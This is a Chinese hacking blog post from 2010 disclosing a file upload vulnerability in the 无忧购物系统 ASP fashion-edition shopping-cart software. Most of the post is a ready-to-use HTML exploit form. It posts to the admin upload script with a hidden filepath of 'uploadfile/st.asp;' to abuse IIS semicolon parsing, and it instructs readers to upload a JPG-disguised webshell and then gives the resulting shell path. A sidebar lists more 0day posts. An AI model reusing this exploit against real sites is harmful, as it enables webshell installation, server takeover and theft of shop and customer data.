无忧购物系统ASP时尚版上传漏洞

2010, September 27, 11:02 PM. 原创笔记
Submitted by admin

FROM http://www.st999.cn/blog

by 流浪的风

关键字:Copyright © 2008-2009 gzwynet.com.cn

目前仅发现时尚版存在这个上传漏洞,明天有时间再看看其他的版本的。

上传利用地址:admin/upLoad_c.asp?a=uploadfile&b=1

利用文件:

<html>
<head>
<title>无忧购物系统ASP时尚版上传漏洞利用程序 BY 流浪的风</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>


<form name="form1" method="post" action="http://www.st999.cn/admin/upLoad_c1.asp"

enctype="multipart/form-data" >
  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
 <TR><td width=20%></td>
 <TD bgcolor=#104A7B width="60%">
 <TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
 <TR>
           <td bgcolor=#eeeeee align=center><font color=red>正在上传文件,请稍候...</font></td>
 </tr>
 </table>
 </td><td width=20%></td>
 </tr>
    </table>
  </div>
  <table width="400" border="0" align="center" cellpadding="0" cellspacing="1"

bordercolorlight="#cccccc" bordercolordark="#CCCCCC" bgcolor="#CCCCCC">
    <tr bgcolor="#CCCCCC">
      <td height="22" align="left" valign="middle" bgcolor="f1f1f1" width="400">&nbsp;文件上传 (允许上

传的文件类型: jpg gif)
        <input type="hidden" name="filepath" value="uploadfile/st.asp;">
        <input type="hidden" name="filelx" value="1">
        <input type="hidden" name="EditName" value="">
        <input type="hidden" name="FormName" value="">
        <input type="hidden" name="act" value="uploadfile">
      </td>
    </tr>
    <tr align="center" valign="middle">
      <td width="400" height="80" align="left" bgcolor="#FFFFFF" id="upid"> 选择文件:
        <input type="file" name="file1" style="width:300'" class="tx1" value="">
      </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
      <td bgcolor="#eeeeee" height="24" width="400">
        <input type="submit" name="Submit" value="· 开始上传 ·" class="button"

onclick="javascript:mysub()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

上传一个JPG格式的小马或一句话

上传后的默认地址:admin/uploadfile/st.asp;(文件名)

如图

大小: 11.15 K
尺寸: 500 x 173
浏览: 37 次
点击打开新窗口浏览全图

实际一句话地址:

大小: 9.61 K
尺寸: 397 x 50
浏览: 50 次
点击打开新窗口浏览全图

利用文件:

无忧购物系统asp时尚版上传漏洞利用程序.html

Tags: 无忧, 上传

« 上一篇 | 下一篇 »

只显示10条记录相关文章
分享网络商城购物系统v3.0全功能版 上传漏洞 (浏览: 15044, 评论: 0)
无忧购物系统ASP时尚版存在后门 (浏览: 13940, 评论: 0)
upfile 又一奇迹般的突破 (浏览: 8118, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 9946, 评论: 0)
深度学习asp整站系统oday (浏览: 8448, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10458, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9229, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 11838, 评论: 0)
良精微博系统上传漏洞 (浏览: 12492, 评论: 0)
无忧购物系统oday发布 (浏览: 8529, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):